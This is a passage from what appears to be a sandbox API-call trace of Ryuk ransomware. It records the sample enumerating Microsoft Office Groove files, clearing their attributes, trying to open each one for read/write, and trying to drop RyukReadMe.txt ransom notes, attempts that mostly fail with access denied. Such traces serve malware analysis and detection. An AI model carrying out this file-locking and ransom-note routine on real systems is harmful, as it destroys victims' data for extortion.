office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\swirl\\header.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.251] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.251] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.251] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0137.251] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.251] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Swirl\\TAB_OFF.GIF", dwFileAttributes=0x80) returned 0 [0137.251] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Swirl\\TAB_OFF.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\swirl\\tab_off.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.251] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.251] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.251] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0137.251] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.252] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Swirl\\TAB_ON.GIF", dwFileAttributes=0x80) returned 0 [0137.252] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Swirl\\TAB_ON.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\swirl\\tab_on.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.252] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.252] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.252] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 0 [0137.252] FindClose (in: hFindFile=0x3a2dc0 | out: hFindFile=0x3a2dc0) returned 1 [0137.252] SetLastError (dwErrCode=0x0) [0137.252] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Swirl\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\swirl\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.252] GetLastError () returned 0x5 [0137.252] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0) returned 0 [0137.252] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.252] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0137.252] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.253] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Swirl.css", dwFileAttributes=0x80) returned 0 [0137.253] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Swirl.css" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\swirl.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.253] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.253] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.253] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0137.253] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.253] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Teal.css", dwFileAttributes=0x80) returned 0 [0137.253] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Teal.css" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\teal.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.253] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.253] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.253] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0137.253] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.254] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\TexturedBlue.css", dwFileAttributes=0x80) returned 0 [0137.254] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\TexturedBlue.css" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\texturedblue.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.254] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.254] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.254] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0137.254] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.254] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\VelvetRose.css", dwFileAttributes=0x80) returned 0 [0137.254] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\VelvetRose.css" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\velvetrose.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.254] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.254] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.255] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 0 [0137.255] FindClose (in: hFindFile=0x3a2d60 | out: hFindFile=0x3a2d60) returned 1 [0137.255] SetLastError (dwErrCode=0x0) [0137.255] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.255] GetLastError () returned 0x5 [0137.255] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0) returned 0 [0137.255] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.255] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.255] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.255] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsVersion1Warning.htm", dwFileAttributes=0x80) returned 0 [0137.255] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsVersion1Warning.htm" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsversion1warning.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.255] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.255] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.255] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.256] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.256] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsViewAttachmentIcons.jpg", dwFileAttributes=0x80) returned 0 [0137.256] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsViewAttachmentIcons.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsviewattachmenticons.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.256] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.256] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.256] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.256] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.256] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsViewAttachmentIconsMask.bmp", dwFileAttributes=0x80) returned 0 [0137.256] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsViewAttachmentIconsMask.bmp" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsviewattachmenticonsmask.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.256] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.256] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.257] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.257] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.257] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsViewFrame.html", dwFileAttributes=0x80) returned 0 [0137.257] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsViewFrame.html" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsviewframe.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.257] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.257] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.257] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.257] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.257] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsViewTemplate.html", dwFileAttributes=0x80) returned 0 [0137.257] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsViewTemplate.html" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsviewtemplate.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.258] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.258] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.258] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.258] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.258] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormToolImages.jpg", dwFileAttributes=0x80) returned 0 [0137.258] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormToolImages.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formtoolimages.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.258] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.258] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.258] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.258] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.258] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\form_edit.js", dwFileAttributes=0x80) returned 0 [0137.259] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\form_edit.js" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\form_edit.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.259] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.259] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.259] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.259] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.259] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\LAUNCH.GIF", dwFileAttributes=0x80) returned 0 [0137.260] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\LAUNCH.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\launch.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.260] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.260] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.260] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.260] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.260] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\macroprogress.gif", dwFileAttributes=0x80) returned 0 [0137.260] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\macroprogress.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\macroprogress.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.260] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.260] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.260] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.260] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.261] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\PublicFunctions.js", dwFileAttributes=0x80) returned 0 [0137.261] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\PublicFunctions.js" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\publicfunctions.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.261] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.261] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.261] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.261] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.261] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\rtf_alignleft.gif", dwFileAttributes=0x80) returned 0 [0137.261] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\rtf_alignleft.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\rtf_alignleft.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.261] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.261] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.262] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.262] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.262] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\rtf_alignright.gif", dwFileAttributes=0x80) returned 0 [0137.262] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\rtf_alignright.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\rtf_alignright.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.262] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.262] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.262] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.262] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.262] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\RTF_BOLD.GIF", dwFileAttributes=0x80) returned 0 [0137.262] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\RTF_BOLD.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\rtf_bold.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.262] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.263] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.263] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.263] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.263] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\rtf_bullets.gif", dwFileAttributes=0x80) returned 0 [0137.263] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\rtf_bullets.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\rtf_bullets.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.263] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.263] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.263] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.263] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.263] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\rtf_center.gif", dwFileAttributes=0x80) returned 0 [0137.264] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\rtf_center.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\rtf_center.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.264] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.264] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.264] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.264] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.264] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\rtf_choosecolor.gif", dwFileAttributes=0x80) returned 0 [0137.264] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\rtf_choosecolor.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\rtf_choosecolor.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.264] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.264] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.264] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.264] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.265] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\rtf_choosefont.gif", dwFileAttributes=0x80) returned 0 [0137.265] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\rtf_choosefont.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\rtf_choosefont.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.265] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.265] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.265] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.265] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.265] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\rtf_decreaseindent.gif", dwFileAttributes=0x80) returned 0 [0137.265] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\rtf_decreaseindent.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\rtf_decreaseindent.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.265] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.265] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.265] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 